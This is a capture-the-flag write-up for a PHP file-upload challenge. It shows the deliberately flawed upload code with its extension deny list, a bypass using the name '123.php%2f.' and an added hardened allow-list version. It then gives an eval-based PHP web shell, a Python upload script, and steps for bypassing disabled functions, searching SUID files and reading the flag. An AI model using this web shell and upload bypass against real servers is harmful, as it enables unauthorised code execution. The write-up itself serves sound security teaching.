Challenge source code
<?php
function blacklist($file){
    $deny_ext = array("php","php5","php4","php3","php2","php1","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","pHp1","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr","sWf","swf","ini");
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    foreach ($deny_ext as $value) {
        if (stristr($ext, $value)){
            return false;
        }
    }
    return true;
}
if(isset($_FILES['file'])){
    $filename = urldecode($_FILES['file']['name']);
    $filecontent = file_get_contents($_FILES['file']['tmp_name']);
    if(blacklist($filename)){
        file_put_contents($filename, $filecontent);
        echo "Success!!!";
    } else {
        echo "Hacker!!!";
    }
} else{
    highlight_file(__FILE__);
}
The file_put_contents function has a path-parsing quirk.
When the uploaded name is 123.php/., the blacklist check sees no extension on the last path component, and file_put_contents treats the name as "create a file called . inside the directory 123.php"; the file that actually gets created is 123.php.
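For comparison, here is how the same handler looks when it is written defensively. This is an added example, not the challenge's code: it validates the raw (never urldecoded) client name against an allow-list of extensions, rejects any path separator or control character, and stores the file under a server-chosen name in a directory assumed to sit outside the web root (UPLOAD_DIR and ALLOWED_EXT are assumptions for the example).

```php
<?php
// Hardened replacement for blacklist() + file_put_contents() (added example).
const UPLOAD_DIR  = '/var/www/uploads';                 // assumption: not served by the web server
const ALLOWED_EXT = ['txt', 'png', 'jpg', 'jpeg', 'pdf']; // assumption: what this app really needs

function safe_upload_name(string $name): ?string {
    // Do NOT urldecode(): decoding is exactly what turned "%2f" into a "/" in the challenge.
    if ($name === '' || strlen($name) > 255) {
        return null;
    }
    // Reject path separators, NUL, control characters and percent signs before anything else,
    // so "123.php/." and "123.php%2f." never reach the extension check.
    if (preg_match('/[\/\\\\\x00-\x1f%]/', $name) || basename($name) !== $name) {
        return null;
    }
    // Exactly one dot: rules out "shell.php.jpg" style double extensions.
    if (substr_count($name, '.') !== 1) {
        return null;
    }
    // Allow-list, compared case-insensitively: "pHp", "phtml", "Html" fail without needing an entry.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Stem restricted to a safe character set.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', pathinfo($name, PATHINFO_FILENAME))) {
        return null;
    }
    return $name;
}

function handle_upload(array $f): string {
    if ($f['error'] !== UPLOAD_ERR_OK) {
        return 'Upload failed';
    }
    $name = safe_upload_name($f['name']);
    if ($name === null) {
        return 'Rejected';
    }
    // The client name only supplies the validated extension; the stored name is random,
    // and move_uploaded_file() refuses anything that is not a genuine upload temp file.
    $ext  = pathinfo($name, PATHINFO_EXTENSION);
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($f['tmp_name'], $dest) ? 'Stored' : 'Upload failed';
}

if (isset($_FILES['file'])) {
    echo handle_upload($_FILES['file']);
}
```

With this version, every name the writeup relies on (123.php, 123.php/., 123.php%2f., and any case variant of a script extension) is rejected before any filesystem call is made.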
Create 1.php with the following content and put it in the same directory as the exploit script:
<?php eval($_POST[0]);phpinfo();?>
# The 0 here is the AntSword (蚁剑) connection password
Exploit: uploading the shell
import requests

url = "http://node6.anna.nssctf.cn:23009/"  # target URL (fill in your own challenge URL)

try:
    # The file name is sent URL-encoded; the server urldecode()s it into "123.php/."
    with open('1.php', 'rb') as fh:
        file = {
            "file": ("123.php%2f.", fh)  # file name and the opened file
        }
        res = requests.post(url=url, files=file)  # send the POST request
    print(res.text)  # print the server response
except Exception as e:
    print("Error:", e)
Accessing 123.php succeeds:
http://node6.anna.nssctf.cn:23009/123.php
# <challenge URL>/123.php
Connecting with AntSword
After connecting with AntSword,
we can see that the flag file is 45 bytes, so it has content, but it cannot be viewed: its permissions are 0740.
Permission 0740 means the file owner can read, write and execute the file, users in the group can only read it, and other users have no access at all.
I tried to change the permissions and found that it failed.
Let's try the terminal.
Commands cannot be executed.
Checking the phpinfo output shows that the command-execution functions are disabled.
Here I used AntSword's "Bypass Disable Functions" plugin to get around this; if you do not have the plugin, set a proxy in AntSword and download it from the AntSword plugin market.
Now commands can be executed.
I originally had SUID privilege escalation in mind; in the end it was enough to access the flag's path directly.
find / -perm -u=s -type f 2>/dev/null
/usr/local/s3cRetTt
flag:
NSSCTF{6daca001-e299-41b9-b407-1c6034ead189}